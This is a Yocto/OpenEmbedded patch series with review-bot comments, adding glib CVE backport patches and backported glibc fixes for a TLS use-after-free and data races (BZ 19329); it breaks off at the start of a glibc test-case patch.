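+index 640f3c0..d640c81 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1446,7 +1446,7 @@ test_maybe (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariantSerialised child;
+
+ serialised.type_info = type_info;
+@@ -1572,7 +1572,7 @@ test_array (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+
+ serialised.type_info = array_info;
+ serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1738,7 +1738,7 @@ test_tuple (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+
+ serialised.type_info = type_info;
+ serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1835,7 +1835,7 @@ test_variant (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariantSerialised child;
+
+ serialised.type_info = type_info;
+@@ -2284,7 +2284,7 @@ serialise_tree (TreeInstance *tree,
+ static void
+ test_byteswap (void)
+ {
+- GVariantSerialised one, two;
++ GVariantSerialised one = { 0, }, two = { 0, };
+ TreeInstance *tree;
+
+ tree = tree_instance_new (NULL, 3);
+@@ -2358,7 +2358,7 @@ test_serialiser_children (void)
+ static void
+ test_fuzz (gdouble *fuzziness)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ TreeInstance *tree;
+
+ /* make an instance */
+--
+2.24.4
+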
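Review bot: `GVariantSerialised child;` stays uninitialised in the test_maybe and test_variant hunks, directly under the line that now zero-fills `serialised`. Presumably `child` is assigned in full before it is read (its use is outside the hunks), but the patch exists so that newly added struct fields never start out as stack garbage, so it should get the same treatment: `GVariantSerialised child = { 0, };`. The description's "following few commits will add a couple of new fields" also no longer matches this series, where the patch is applied last (its `index f910bd4..8ba701e` on glib/gvariant.c follows patch 0008's `fdd36be..f910bd4`).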
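--- a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
+++ b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
@@ -18,6 +18,44 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \
  file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \
  file://tzdata-update.patch \
  file://CVE-2020-35457.patch \
+ file://CVE-2021-27218.patch \
+ file://CVE-2021-27219-01.patch \
+ file://CVE-2021-27219-02.patch \
+ file://CVE-2021-27219-03.patch \
+ file://CVE-2021-27219-04.patch \
+ file://CVE-2021-27219-05.patch \
+ file://CVE-2021-27219-06.patch \
+ file://CVE-2021-27219-07.patch \
+ file://CVE-2021-27219-08.patch \
+ file://CVE-2021-27219-09.patch \
+ file://CVE-2021-27219-10.patch \
+ file://CVE-2021-27219-11.patch \
+ file://CVE-2021-27219-reg1-1.patch \
+ file://CVE-2021-27219-reg1-2.patch \
+ file://CVE-2021-27219-reg1-4.patch \
+ file://CVE-2021-27219-reg1-5.patch \
+ file://CVE-2021-27219-reg2-1.patch \
+ file://CVE-2021-27219-reg2-2.patch \
+ file://CVE-2021-27219-reg2-3.patch \
+ file://CVE-2021-28153-1.patch \
+ file://CVE-2021-28153-2.patch \
+ file://CVE-2021-28153-3.patch \
+ file://CVE-2021-28153-4.patch \
+ file://CVE-2021-28153-5.patch \
+ file://CVE-2023-32665-0001.patch \
+ file://CVE-2023-32665-0002.patch \
+ file://CVE-2023-32665-0003.patch \
+ file://CVE-2023-32665-0004.patch \
+ file://CVE-2023-32665-0005.patch \
+ file://CVE-2023-32665-0006.patch \
+ file://CVE-2023-32665-0007.patch \
+ file://CVE-2023-32665-0008.patch \
+ file://CVE-2023-32665-0009.patch \
+ file://CVE-2023-29499.patch \
+ file://CVE-2023-32611-0001.patch \
+ file://CVE-2023-32611-0002.patch \
+ file://CVE-2023-32643.patch \
+ file://CVE-2023-32636.patch \
  "
 
 SRC_URI_append_class-native = " file://relocate-modules.patch"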
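Review bot: The CVE-2021-27219 regression series added to `SRC_URI` skips a number: `CVE-2021-27219-reg1-1`, `-reg1-2`, `-reg1-4` and `-reg1-5` are listed, with no `-reg1-3`. If that upstream change does not apply to 2.62.6 the gap is fine, but nothing in the recipe says so, and a silently dropped patch in a security backport is hard to spot later. A comment above the `SRC_URI` assignment would settle it, for example `# CVE-2021-27219-reg1-3 not applied: <reason, placeholder>`.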
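--- a/meta/recipes-core/glib-2.0/glib.inc
+++ b/meta/recipes-core/glib-2.0/glib.inc
@@ -4,7 +4,7 @@ HOMEPAGE = "https://developer.gnome.org/glib/"
 
 # pcre is under BSD;
 # docs/reference/COPYING is with a 'public domain'-like license!
-LICENSE = "LGPLv2.1+ & BSD & PD"
+LICENSE = "LGPLv2.1+ & BSD-3-Clause & PD"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
  file://glib/glib.h;beginline=4;endline=17;md5=b88abb7f3ad09607e71cb9d530155906 \
  file://gmodule/COPYING;md5=4fbd65380cdd255951079008b364516c \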
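--- a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
+++ b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
@@ -20,7 +20,7 @@ inherit autotools
 FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:"
 
 SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
- git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \
+ git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \
  \
  file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \
  \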
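Review bot: Only the localedef entry gains `;protocol=https`; the first entry, `${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc`, still resolves to the default `git://sourceware.org/git/glibc.git` shown in glibc-version.inc, so the glibc source itself is still fetched over the unauthenticated git protocol. The pinned `SRCREV_glibc` limits what a tampered transfer can achieve, but the fetch remains cleartext and fails on networks that block the git port. Consider adding `;protocol=https` to that entry as well, or to the `GLIBC_GIT_URI` default, after confirming the server offers HTTPS for that path.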
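--- a/meta/recipes-core/glibc/glibc-version.inc
+++ b/meta/recipes-core/glibc/glibc-version.inc
@@ -1,6 +1,6 @@
 SRCBRANCH ?= "release/2.31/master"
 PV = "2.31+git${SRCPV}"
-SRCREV_glibc ?= "df31c7ca927242d5d4eee97f93a01e23ff47e332"
+SRCREV_glibc ?= "2d4f26e5cfda682f9ce61444b81533b83f6381af"
 SRCREV_localedef ?= "cd9f958c4c94a638fa7b2b4e21627364f1a1a655"
 
 GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git"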
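--- a/meta/recipes-core/glibc/glibc.inc
+++ b/meta/recipes-core/glibc/glibc.inc
@@ -1,7 +1,9 @@
 require glibc-common.inc
 require glibc-ld.inc
 
-DEPENDS = "virtual/${TARGET_PREFIX}gcc libgcc-initial linux-libc-headers"
+DEPENDS = "virtual/${TARGET_PREFIX}gcc virtual/${TARGET_PREFIX}binutils${BUSUFFIX} libgcc-initial linux-libc-headers"
+BUSUFFIX= ""
+BUSUFFIX:class-nativesdk = "-crosssdk"
 
 PROVIDES = "virtual/libc"
 PROVIDES += "virtual/libintl virtual/libiconv"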
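Review bot: `BUSUFFIX= ""` is written without a space before `=`, unlike every other assignment in the hunk, and both BUSUFFIX lines sit below the `DEPENDS` line that expands them with no explanation. For readability I would write `BUSUFFIX = ""`, move the pair above `DEPENDS`, and add a comment such as `# binutils provider suffix; nativesdk builds take the crosssdk binutils`. The override uses the `:` separator and no other override is visible in this chunk. Confirm that this branch's parser treats `BUSUFFIX:class-nativesdk` as an override and not as a separate variable name, otherwise the nativesdk glibc would depend on the wrong binutils provider.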
diff --git a/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
new file mode 100644
index 0000000000..dba491f4dc
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
@@ -0,0 +1,66 @@
1From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Wed, 30 Dec 2020 21:52:38 +0000
4Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free
5
6map is not valid to access here because it can be freed by a concurrent
7dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is
8called without holding dlopen locks. So don't check the modid of map.
9
10The map == 0 and map != 0 code paths can be shared (avoiding the dtv
11resize in case of map == 0 is just an optimization: larger dtv than
12necessary would be fine too).
13
14Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
15---
16 elf/dl-tls.c | 21 +++++----------------
17 1 file changed, 5 insertions(+), 16 deletions(-)
18---
19Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee]
20Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
21Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
22---
23diff --git a/elf/dl-tls.c b/elf/dl-tls.c
24index 24d00c14ef..f8b32b3ecb 100644
25--- a/elf/dl-tls.c
26+++ b/elf/dl-tls.c
27@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid)
28 {
29 for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt)
30 {
31+ size_t modid = total + cnt;
32+
33 size_t gen = listp->slotinfo[cnt].gen;
34
35 if (gen > new_gen)
36@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid)
37
38 /* If there is no map this means the entry is empty. */
39 struct link_map *map = listp->slotinfo[cnt].map;
40- if (map == NULL)
41- {
42- if (dtv[-1].counter >= total + cnt)
43- {
44- /* If this modid was used at some point the memory
45- might still be allocated. */
46- free (dtv[total + cnt].pointer.to_free);
47- dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED;
48- dtv[total + cnt].pointer.to_free = NULL;
49- }
50-
51- continue;
52- }
53-
54 /* Check whether the current dtv array is large enough. */
55- size_t modid = map->l_tls_modid;
56- assert (total + cnt == modid);
57 if (dtv[-1].counter < modid)
58 {
59+ if (map == NULL)
60+ continue;
61+
62 /* Resize the dtv. */
63 dtv = _dl_resize_dtv (dtv);
64
65--
662.27.0
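Review bot: After this change `map` may only be compared with NULL, but nothing next to the code says so; the comment `/* If there is no map this means the entry is empty. */` now sits above the load while the NULL test has moved inside the resize branch. I would add a comment at the new `if (map == NULL) continue;` lines, for example `/* Empty slot: no resize needed. map may be freed by a concurrent dlclose, so never dereference it here. */`. The rest of `_dl_update_slotinfo`, including the code that frees the old dtv entry on the now-shared path, lies outside the hunk, so I cannot confirm from here that no later line reads through `map`.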
diff --git a/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
new file mode 100644
index 0000000000..25beee1d50
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
@@ -0,0 +1,191 @@
1From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Wed, 30 Dec 2020 19:19:37 +0000
4Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ
5 #19329]
6
7DTV setup at thread creation (_dl_allocate_tls_init) is changed
8to take the dlopen lock, GL(dl_load_lock). Avoiding data races
9here without locks would require design changes: the map that is
10accessed for static TLS initialization here may be concurrently
11freed by dlclose. That use after free may be solved by only
12locking around static TLS setup or by ensuring dlclose does not
13free modules with static TLS, however currently every link map
14with TLS has to be accessed at least to see if it needs static
15TLS. And even if that's solved, still a lot of atomics would be
16needed to synchronize DTV related globals without a lock. So fix
17both bug 19329 and bug 27111 with a lock that prevents DTV setup
18running concurrently with dlopen or dlclose.
19
20_dl_update_slotinfo at TLS access still does not use any locks
21so CONCURRENCY NOTES are added to explain the synchronization.
22The early exit from the slotinfo walk when max_modid is reached
23is not strictly necessary, but does not hurt either.
24
25An incorrect acquire load was removed from _dl_resize_dtv: it
26did not synchronize with any release store or fence and
27synchronization is now handled separately at thread creation
28and TLS access time.
29
30There are still a number of racy read accesses to globals that
31will be changed to relaxed MO atomics in a followup patch. This
32should not introduce regressions compared to existing behaviour
33and avoid cluttering the main part of the fix.
34
35Not all TLS access related data races got fixed here: there are
36additional races at lazy tlsdesc relocations see bug 27137.
37
38Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
39---
40 elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++-------------
41 1 file changed, 47 insertions(+), 16 deletions(-)
42---
43Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54]
44Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
45Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
46---
47diff --git a/elf/dl-tls.c b/elf/dl-tls.c
48index 6baff0c1ea..94f3cdbae0 100644
49--- a/elf/dl-tls.c
50+++ b/elf/dl-tls.c
51@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[];
52 #endif
53
54 static dtv_t *
55-_dl_resize_dtv (dtv_t *dtv)
56+_dl_resize_dtv (dtv_t *dtv, size_t max_modid)
57 {
58 /* Resize the dtv. */
59 dtv_t *newp;
60- /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by
61- other threads concurrently. */
62- size_t newsize
63- = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS;
64+ size_t newsize = max_modid + DTV_SURPLUS;
65 size_t oldsize = dtv[-1].counter;
66
67 if (dtv == GL(dl_initial_dtv))
68@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result)
69 size_t total = 0;
70 size_t maxgen = 0;
71
72+ /* Protects global dynamic TLS related state. */
73+ __rtld_lock_lock_recursive (GL(dl_load_lock));
74+
75 /* Check if the current dtv is big enough. */
76 if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
77 {
78 /* Resize the dtv. */
79- dtv = _dl_resize_dtv (dtv);
80+ dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx));
81
82 /* Install this new dtv in the thread data structures. */
83 INSTALL_DTV (result, &dtv[-1]);
84@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result)
85 listp = listp->next;
86 assert (listp != NULL);
87 }
88+ __rtld_lock_unlock_recursive (GL(dl_load_lock));
89
90 /* The DTV version is up-to-date now. */
91 dtv[0].counter = maxgen;
92@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid)
93
94 if (dtv[0].counter < listp->slotinfo[idx].gen)
95 {
96- /* The generation counter for the slot is higher than what the
97- current dtv implements. We have to update the whole dtv but
98- only those entries with a generation counter <= the one for
99- the entry we need. */
100+ /* CONCURRENCY NOTES:
101+
102+ Here the dtv needs to be updated to new_gen generation count.
103+
104+ This code may be called during TLS access when GL(dl_load_lock)
105+ is not held. In that case the user code has to synchronize with
106+ dlopen and dlclose calls of relevant modules. A module m is
107+ relevant if the generation of m <= new_gen and dlclose of m is
108+ synchronized: a memory access here happens after the dlopen and
109+ before the dlclose of relevant modules. The dtv entries for
110+ relevant modules need to be updated, other entries can be
111+ arbitrary.
112+
113+ This e.g. means that the first part of the slotinfo list can be
114+ accessed race free, but the tail may be concurrently extended.
115+ Similarly relevant slotinfo entries can be read race free, but
116+ other entries are racy. However updating a non-relevant dtv
117+ entry does not affect correctness. For a relevant module m,
118+ max_modid >= modid of m. */
119 size_t new_gen = listp->slotinfo[idx].gen;
120 size_t total = 0;
121+ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
122+ assert (max_modid >= req_modid);
123
124 /* We have to look through the entire dtv slotinfo list. */
125 listp = GL(dl_tls_dtv_slotinfo_list);
126@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid)
127 {
128 size_t modid = total + cnt;
129
130+ /* Later entries are not relevant. */
131+ if (modid > max_modid)
132+ break;
133+
134 size_t gen = listp->slotinfo[cnt].gen;
135
136 if (gen > new_gen)
137- /* This is a slot for a generation younger than the
138- one we are handling now. It might be incompletely
139- set up so ignore it. */
140+ /* Not relevant. */
141 continue;
142
143 /* If the entry is older than the current dtv layout we
144@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid)
145 continue;
146
147 /* Resize the dtv. */
148- dtv = _dl_resize_dtv (dtv);
149+ dtv = _dl_resize_dtv (dtv, max_modid);
150
151 assert (modid <= dtv[-1].counter);
152
153@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid)
154 }
155
156 total += listp->len;
157+ if (total > max_modid)
158+ break;
159+
160+ /* Synchronize with _dl_add_to_slotinfo. Ideally this would
161+ be consume MO since we only need to order the accesses to
162+ the next node after the read of the address and on most
163+ hardware (other than alpha) a normal load would do that
164+ because of the address dependency. */
165+ listp = atomic_load_acquire (&listp->next);
166 }
167- while ((listp = listp->next) != NULL);
168+ while (listp != NULL);
169
170 /* This will be the new maximum generation counter. */
171 dtv[0].counter = new_gen;
172@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add)
173 the first slot. */
174 assert (idx == 0);
175
176- listp = prevp->next = (struct dtv_slotinfo_list *)
177+ listp = (struct dtv_slotinfo_list *)
178 malloc (sizeof (struct dtv_slotinfo_list)
179 + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
180 if (listp == NULL)
181@@ -1000,6 +1029,8 @@ cannot create TLS data structures"));
182 listp->next = NULL;
183 memset (listp->slotinfo, '\0',
184 TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
185+ /* Synchronize with _dl_update_slotinfo. */
186+ atomic_store_release (&prevp->next, listp);
187 }
188
189 /* Add the information into the slotinfo data structure. */
190--
1912.27.0
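Review bot: `_dl_resize_dtv` now sizes the new dtv from its `max_modid` argument, but nothing at the definition states what the caller has to guarantee. In `_dl_update_slotinfo` the value is a relaxed snapshot of `GL(dl_tls_max_dtv_idx)`, and the only check after the resize is `assert (modid <= dtv[-1].counter)`, which holds because of the `if (modid > max_modid) break;` added earlier in the loop. I would document that above the function, e.g. `/* MAX_MODID is the caller's snapshot of GL(dl_tls_max_dtv_idx); callers must not index the result beyond it. */`. In `_dl_allocate_tls_init` most of the code between the new lock and unlock calls is outside the hunks, so it is worth confirming that no exit path in between leaves `GL(dl_load_lock)` held.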
diff --git a/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
new file mode 100644
index 0000000000..eb8ef3161c
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
@@ -0,0 +1,206 @@
1From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Wed, 30 Dec 2020 19:19:37 +0000
4Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329]
5
6This is a follow up patch to the fix for bug 19329. This adds relaxed
7MO atomics to accesses that were previously data races but are now
8race conditions, and where relaxed MO is sufficient.
9
10The race conditions all follow the pattern that the write is behind the
11dlopen lock, but a read can happen concurrently (e.g. during tls access)
12without holding the lock. For slotinfo entries the read value only
13matters if it reads from a synchronized write in dlopen or dlclose,
14otherwise the related dtv entry is not valid to access so it is fine
15to leave it in an inconsistent state. The same applies for
16GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the
17algorithm relies on the fact that the read of the last synchronized
18write is an increasing value.
19
20Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
21---
22 elf/dl-close.c | 20 +++++++++++++-------
23 elf/dl-open.c | 5 ++++-
24 elf/dl-tls.c | 31 +++++++++++++++++++++++--------
25 sysdeps/x86_64/dl-tls.c | 3 ++-
26 4 files changed, 42 insertions(+), 17 deletions(-)
27---
28Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9]
29Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change.
30Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
31Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
32---
33diff --git a/elf/dl-close.c b/elf/dl-close.c
34index c51becd06b..3720e47dd1 100644
35--- a/elf/dl-close.c
36+++ b/elf/dl-close.c
37@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
38 {
39 assert (old_map->l_tls_modid == idx);
40
41- /* Mark the entry as unused. */
42- listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1;
43- listp->slotinfo[idx - disp].map = NULL;
44+ /* Mark the entry as unused. These can be read concurrently. */
45+ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
46+ GL(dl_tls_generation) + 1);
47+ atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL);
48 }
49
50 /* If this is not the last currently used entry no need to look
51@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
52
53 if (listp->slotinfo[idx - disp].map != NULL)
54 {
55- /* Found a new last used index. */
56- GL(dl_tls_max_dtv_idx) = idx;
57+ /* Found a new last used index. This can be read concurrently. */
58+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx);
59 return true;
60 }
61 }
62@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force)
63 GL(dl_tls_dtv_slotinfo_list), 0,
64 imap->l_init_called))
65 /* All dynamically loaded modules with TLS are unloaded. */
66- GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem);
67+ /* Can be read concurrently. */
68+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx),
69+ GL(dl_tls_static_nelem));
70
71 if (imap->l_tls_offset != NO_TLS_OFFSET
72 && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET)
73@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force)
74 /* If we removed any object which uses TLS bump the generation counter. */
75 if (any_tls)
76 {
77- if (__glibc_unlikely (++GL(dl_tls_generation) == 0))
78+ size_t newgen = GL(dl_tls_generation) + 1;
79+ if (__glibc_unlikely (newgen == 0))
80 _dl_fatal_printf ("TLS generation counter wrapped! Please report as described in "REPORT_BUGS_TO".\n");
81+ /* Can be read concurrently. */
82+ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
83
84 if (tls_free_end == GL(dl_tls_static_used))
85 GL(dl_tls_static_used) = tls_free_start;
86diff --git a/elf/dl-open.c b/elf/dl-open.c
87index 09f0df7d38..bb79ef00f1 100644
88--- a/elf/dl-open.c
89+++ b/elf/dl-open.c
90@@ -387,9 +387,12 @@
91 }
92 }
93
94- if (__builtin_expect (++GL(dl_tls_generation) == 0, 0))
95+ size_t newgen = GL(dl_tls_generation) + 1;
96+ if (__glibc_unlikely (newgen == 0))
97 _dl_fatal_printf (N_("\
98 TLS generation counter wrapped! Please report this."));
99+ /* Can be read concurrently. */
100+ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
101
102 /* We need a second pass for static tls data, because
103 _dl_update_slotinfo must not be run while calls to
104diff --git a/elf/dl-tls.c b/elf/dl-tls.c
105index 94f3cdbae0..dc69cd984e 100644
106--- a/elf/dl-tls.c
107+++ b/elf/dl-tls.c
108@@ -96,7 +96,9 @@
109 /* No gaps, allocate a new entry. */
110 nogaps:
111
112- result = ++GL(dl_tls_max_dtv_idx);
113+ result = GL(dl_tls_max_dtv_idx) + 1;
114+ /* Can be read concurrently. */
115+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
116 }
117
118 return result;
119@@ -279,10 +281,12 @@
120 dtv_t *dtv;
121 size_t dtv_length;
122
123+ /* Relaxed MO, because the dtv size is later rechecked, not relied on. */
124+ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
125 /* We allocate a few more elements in the dtv than are needed for the
126 initial set of modules. This should avoid in most cases expansions
127 of the dtv. */
128- dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS;
129+ dtv_length = max_modid + DTV_SURPLUS;
130 dtv = calloc (dtv_length + 2, sizeof (dtv_t));
131 if (dtv != NULL)
132 {
133@@ -687,7 +691,7 @@
134 if (modid > max_modid)
135 break;
136
137- size_t gen = listp->slotinfo[cnt].gen;
138+ size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen);
139
140 if (gen > new_gen)
141 /* Not relevant. */
142@@ -699,7 +703,8 @@
143 continue;
144
145 /* If there is no map this means the entry is empty. */
146- struct link_map *map = listp->slotinfo[cnt].map;
147+ struct link_map *map
148+ = atomic_load_relaxed (&listp->slotinfo[cnt].map);
149 /* Check whether the current dtv array is large enough. */
150 if (dtv[-1].counter < modid)
151 {
152@@ -843,7 +848,12 @@
153 {
154 dtv_t *dtv = THREAD_DTV ();
155
156- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
157+ /* Update is needed if dtv[0].counter < the generation of the accessed
158+ module. The global generation counter is used here as it is easier
159+ to check. Synchronization for the relaxed MO access is guaranteed
160+ by user code, see CONCURRENCY NOTES in _dl_update_slotinfo. */
161+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
162+ if (__glibc_unlikely (dtv[0].counter != gen))
163 return update_get_addr (GET_ADDR_PARAM);
164
165 void *p = dtv[GET_ADDR_MODULE].pointer.val;
166@@ -866,7 +876,10 @@
167 return NULL;
168
169 dtv_t *dtv = THREAD_DTV ();
170- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
171+ /* This may be called without holding the GL(dl_load_lock). Reading
172+ arbitrary gen value is fine since this is best effort code. */
173+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
174+ if (__glibc_unlikely (dtv[0].counter != gen))
175 {
176 /* This thread's DTV is not completely current,
177 but it might already cover this module. */
178@@ -961,7 +974,9 @@
179 /* Add the information into the slotinfo data structure. */
180 if (do_add)
181 {
182- listp->slotinfo[idx].map = l;
183- listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1;
184+ /* Can be read concurrently. See _dl_update_slotinfo. */
185+ atomic_store_relaxed (&listp->slotinfo[idx].map, l);
186+ atomic_store_relaxed (&listp->slotinfo[idx].gen,
187+ GL(dl_tls_generation) + 1);
188 }
189 }
190
191diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c
192index 6595f6615b..24ef560b71 100644
193--- a/sysdeps/x86_64/dl-tls.c
194+++ b/sysdeps/x86_64/dl-tls.c
195@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS)
196 {
197 dtv_t *dtv = THREAD_DTV ();
198
199- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
200+ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
201+ if (__glibc_unlikely (dtv[0].counter != gen))
202 return update_get_addr (GET_ADDR_PARAM);
203
204 return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL);
205--
2062.27.0
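Review bot: The new comments explain the stores ("Can be read concurrently") but not the matching plain reads: `size_t newgen = GL(dl_tls_generation) + 1;` in dl-close.c and dl-open.c and `result = GL(dl_tls_max_dtv_idx) + 1;` in dl-tls.c read the same globals non-atomically. The commit message gives the reason, that every write is behind the dlopen lock, and I would put that next to the code, e.g. `/* Plain read: writers hold GL(dl_load_lock). */`. The dl-open.c and dl-tls.c hunks were refreshed and carry no function name in their `@@` headers, so the enclosing functions and the lock acquisition are outside the view.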
diff --git a/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
new file mode 100644
index 0000000000..f22e52ea99
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
@@ -0,0 +1,144 @@
1From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001
2From: Szabolcs Nagy <szabolcs.nagy@arm.com>
3Date: Tue, 13 Dec 2016 12:28:41 +0000
4Subject: [PATCH] elf: Add test case for [BZ #19329]
5
6Test concurrent dlopen and pthread_create when the loaded modules have
7TLS. This triggers dl-tls assertion failures more reliably than the
8nptl/tst-stack4 test.
9
10The dlopened module has 100 DT_NEEDED dependencies with TLS, they were
11reused from an existing TLS test. The number of created threads during
12dlopen depends on filesystem speed and hardware, but at most 3 threads
13are alive at a time to limit resource usage.
14
15Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
16---
17 elf/Makefile | 9 ++++--
18 elf/tst-tls21.c | 68 ++++++++++++++++++++++++++++++++++++++++++++++
19 elf/tst-tls21mod.c | 1 +
20 3 files changed, 76 insertions(+), 2 deletions(-)
21 create mode 100644 elf/tst-tls21.c
22 create mode 100644 elf/tst-tls21mod.c
23---
